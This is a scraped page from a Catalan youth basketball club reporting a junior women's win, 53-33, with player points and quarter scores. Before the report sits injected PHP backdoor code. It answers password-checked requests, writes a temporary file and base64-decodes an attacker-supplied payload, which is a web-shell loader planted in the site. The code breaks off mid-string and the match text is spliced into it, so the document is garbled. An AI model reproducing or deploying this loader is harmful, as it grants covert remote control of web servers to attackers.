function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Júnior fem. 06-07A suma una victòria treballada! (53-33) - Tgn Bàsquet Club -

El Júnior fem. 06-07A suma una victòria treballada! (53-33)

Updated: gener 25, 2024

Partit entre dos equips igualats a victòries a la part baixa de la taula.

Els dos primers períodes el TGN va sortir sabent que si no imprimia un ritme més gran que el rival, tant en defensa com en atac, patiria per emportar-se el partit. Amb això va aconseguir que el rival cometés molts errors i que encistés poques cistelles.

Al tercer quart, començaria l’ensurt, perquè el rival va defensar millor a tota pista i tancant el local a la banda a la pujada de pilota va aconseguir diversos robatoris de pilota que van suposar cistelles senzilles. Els vint punts d’avantatge que separaven els equips al descans van valer al final del matx, perquè la segona part va ser igualada entre els dos equips. Enhorabona LILES!

TGN BÀSQUET 06/07A – 53 VS CB SANT JOSEP OBRER – 33

TGN BÀSQUET 06-07A: Ramón (5), Castellví (8), Fernández (1), Iglesias (12), Monzón (6),—cinc inicial—Toda (4), Comino (8), Estebanell (8), Bonet (0), Menzinger (2).  2 triples: Comino (2).  10/22  tirs lliures. 15 faltes.

CB SANT JOSEP OBRER BLANC: Leiva (3), Pérez, A (7), Mansilla (0), Pérez L (11), Lamonja (2) —cinc inicial— Arias (2), Zurera (0), Rosa (1), Perez I (7), De Mas (0), Rodriguez (0).  1 triples. 4/18 tirs lliures. 21 faltes.

PARCIALS: 19-04, 14-05, 12-10, 09-14